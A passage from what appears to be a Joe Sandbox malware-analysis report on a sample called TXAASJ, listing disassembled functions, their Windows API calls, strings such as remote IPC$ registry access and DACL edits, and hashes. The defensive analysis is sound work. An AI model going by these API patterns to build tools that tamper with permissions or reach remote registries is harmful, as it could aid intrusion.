                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EBBD04,?,?), ref: 00EBE564
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE57B
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE586
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE593
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EBE59C
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5AB
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EBE5B4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5BB
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EBBD04,?,?,00000000,?), ref: 00EBE5CC
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EDD9BC,?), ref: 00EBE5E5
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EBE5F5
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EBE619
                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EBE644
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EBE66C
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EBE682
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3840717409-0
                                                                                                                        • Opcode ID: bfbaef7b3f14557a0f4965d8bd6a54c64c6f65039e9c267a928990122542542f
                                                                                                                        • Instruction ID: e765d4824162c45d42d35666f5555465338f9e67a547b499f8307ea625d5bd98
                                                                                                                        • Opcode Fuzzy Hash: bfbaef7b3f14557a0f4965d8bd6a54c64c6f65039e9c267a928990122542542f
                                                                                                                        • Instruction Fuzzy Hash: B5417975602204AFCB219F66EC88EEBBBB8FF89715F108059F906E7260D7319D04CB60
                                                                                                                        Function 00EA0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA0C93
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0CAB
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0CBD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EA0CD2
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0CE6
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EA0CFE
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA0D18
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0D2A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                        • Opcode ID: 52263f8f626f9a5f97c42b19ac165023857cabc9ffa0f5513fad60a98f7c9d27
                                                                                                                        • Instruction ID: e97b7a60a025234c55d9350fb1b26914f1e03620e98d3aaaf42b265d92a26e67
                                                                                                                        • Opcode Fuzzy Hash: 52263f8f626f9a5f97c42b19ac165023857cabc9ffa0f5513fad60a98f7c9d27
                                                                                                                        • Instruction Fuzzy Hash: 5981A4725043059FCB24DF64C844AAAB7E8BB8E314F14992EF985EB251E730FD85CB52
                                                                                                                        Function 00EBECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EBED0C
                                                                                                                        • GetFocus.USER32 ref: 00EBED1C
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00EBED27
                                                                                                                        • _memset.LIBCMT ref: 00EBEE52
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00EBEE7D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EBEE9D
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EBEEB0
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00EBEEE4
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00EBEF2C
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EBEF64
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EBEF99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1296962147-4108050209
                                                                                                                        • Opcode ID: 47684d001f803846810415fafb5bd6e4f5dd33624e171129401d40986a9d1a7e
                                                                                                                        • Instruction ID: 4302031d7ccad827bc449811e7614fa01076e1ce9156445c1c0bffb76984d66d
                                                                                                                        • Opcode Fuzzy Hash: 47684d001f803846810415fafb5bd6e4f5dd33624e171129401d40986a9d1a7e
                                                                                                                        • Instruction Fuzzy Hash: 77817D71208301AFD710DF15D884AEBBBE5FB88358F00592EFA99A7391D770D905DBA2
                                                                                                                        Function 00E8B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                          • Part of subcall function 00E8B8E7: GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
                                                                                                                          • Part of subcall function 00E8B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                          • Part of subcall function 00E8B8E7: HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                          • Part of subcall function 00E8B982: GetProcessHeap.KERNEL32(00000008,00E8B3E1,00000000,00000000,?,00E8B3E1,?), ref: 00E8B98E
                                                                                                                          • Part of subcall function 00E8B982: HeapAlloc.KERNEL32(00000000,?,00E8B3E1,?), ref: 00E8B995
                                                                                                                          • Part of subcall function 00E8B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E8B3E1,?), ref: 00E8B9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E8B5F7
                                                                                                                        • _memset.LIBCMT ref: 00E8B60C
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8B62B
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B63C
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E8B679
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E8B695
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B6B2
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E8B6C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E8B6C8
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E8B6E9
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00E8B6F0
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8B721
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E8B747
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8B75B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        • Opcode ID: 583168eb8fbe2ee3ec997bc70205a4eb881ea0abeaf928b754b6ac568d761dc4
                                                                                                                        • Instruction ID: aeaeeb3fb593d2669f2e7f4076ffa7d1ee7c81e13415c2b22b018dd70929d2b6
                                                                                                                        • Opcode Fuzzy Hash: 583168eb8fbe2ee3ec997bc70205a4eb881ea0abeaf928b754b6ac568d761dc4
                                                                                                                        • Instruction Fuzzy Hash: 30514DB5900209AFDF04AFA5DC45EEEBBB9FF45314F04816AF919B72A0D7319A05CB60
                                                                                                                        Function 00EAA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAA2DD
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EAA2E9
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00EAA2F5
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00EAA302
                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EAA356
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EAA392
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EAA3B6
                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00EAA3BE
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EAA3C7
                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00EAA3CE
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EAA3D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        • Opcode ID: 175e0d55b792b3138ac22537d6343a7137b4eb6d7764887ab2906160f63e0a2e
                                                                                                                        • Instruction ID: 3c67d13beb3da2c99034887ecea78f5487b30599b60228ff4ca5feaee7b0bdde
                                                                                                                        • Opcode Fuzzy Hash: 175e0d55b792b3138ac22537d6343a7137b4eb6d7764887ab2906160f63e0a2e
                                                                                                                        • Instruction Fuzzy Hash: 12516C71905309EFCB15CFA9DC84EAEBBB9EF49310F14842EF959AB250C731A845CB60
                                                                                                                        Function 00E95FDB Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95FF5
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E96082
                                                                                                                        • GetMenuItemCount.USER32(00F118F0), ref: 00E9610B
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000005,00000000,000000F5,?,?), ref: 00E9619B
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000004,00000000), ref: 00E961A3
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000006,00000000), ref: 00E961AB
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000003,00000000), ref: 00E961B3
                                                                                                                        • GetMenuItemCount.USER32(00F118F0), ref: 00E961BB
                                                                                                                        • SetMenuItemInfoW.USER32(00F118F0,00000004,00000000,00000030), ref: 00E961F1
                                                                                                                        • GetCursorPos.USER32(?), ref: 00E961FB
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00E96204
                                                                                                                        • TrackPopupMenuEx.USER32(00F118F0,00000000,?,00000000,00000000,00000000), ref: 00E96217
                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E96223
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3993528054-0
                                                                                                                        • Opcode ID: c72e52b9122aecfa1043666b9627c2737c5d187b2bd01b8dd77c65897976657d
                                                                                                                        • Instruction ID: c7c3afae032b1af5c0014e632b36bad21c2b2451818934da6b4a674dc23e9937
                                                                                                                        • Opcode Fuzzy Hash: c72e52b9122aecfa1043666b9627c2737c5d187b2bd01b8dd77c65897976657d
                                                                                                                        • Instruction Fuzzy Hash: 67710230605215BEEF319B25DC89FAABFA4FF00368F245207F628761E1C7B16864DB90
                                                                                                                        Function 00E9D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 00E9D567
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E9D589
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D5DC
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D68D
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D6AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                        • Opcode ID: 15522d9db30192111d815b5dc23c9ec7f4c18c4f529467dd456b3c85899d183d
                                                                                                                        • Instruction ID: 24a6d6d9f37172544763013ebee1bbb9d65668f2c51799d7b65c8230f7d23b0d
                                                                                                                        • Opcode Fuzzy Hash: 15522d9db30192111d815b5dc23c9ec7f4c18c4f529467dd456b3c85899d183d
                                                                                                                        • Instruction Fuzzy Hash: E051B771904209BBCF15FBA0DD42EEEB7B9AF14301F105466F505B20A2EB715F58EB61
                                                                                                                        Function 00E9D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00E9D37F
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E9D3A0
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D3F3
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D499
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D4B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                        • Opcode ID: 18a0ba8091f7a6f8879abfcd34b08622b8b574777379f1b2af03dbc688a1b6cf
                                                                                                                        • Instruction ID: f70d8895b061a168e0fc046f8199d7d8e80712952a316aa5e02e874021201b2d
                                                                                                                        • Opcode Fuzzy Hash: 18a0ba8091f7a6f8879abfcd34b08622b8b574777379f1b2af03dbc688a1b6cf
                                                                                                                        • Instruction Fuzzy Hash: 0851D372904209BBCF15FBE0DD42EEEB7B9AF14301F109456F505B20A2EA316F58EB61
                                                                                                                        Function 00E8AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • _memset.LIBCMT ref: 00E8AF74
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E8AFA9
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E8AFC5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E8AFE1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E8B00B
                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E8B033
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8B03E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8B043
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                        • Opcode ID: c1ac95d253f489f072206c64b42ab3e5aaa96e9dd0683ce5c8bfd2b5fe483f5d
                                                                                                                        • Instruction ID: 2cc53b3f47ba620b5c67351dc4e5198d9010841bdb77290ba5ec1657be74e695
                                                                                                                        • Opcode Fuzzy Hash: c1ac95d253f489f072206c64b42ab3e5aaa96e9dd0683ce5c8bfd2b5fe483f5d
                                                                                                                        • Instruction Fuzzy Hash: F2413876C14228ABDF11EBA4EC95DEEB7B8FF04745F00442AE905B31A0EB709E09DB50
                                                                                                                        Function 00EB3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                        • Opcode ID: a2a788127d9d9861529a6eb6cbe2636b15eb3b0d95686b76dd25180044b15905
                                                                                                                        • Instruction ID: 332dd528473927d106ec49789dd75d3d672d5778b8f8f41a6bbd32d00223e21f
                                                                                                                        • Opcode Fuzzy Hash: a2a788127d9d9861529a6eb6cbe2636b15eb3b0d95686b76dd25180044b15905
                                                                                                                        • Instruction Fuzzy Hash: 8B41A4741403458BCF08EF64EC52AEB7791AF15394F182864EC627B296DB309E19DF60
                                                                                                                        Function 00E983D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9843F
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E98455
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E98466
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E98478
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E98489
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_memmove
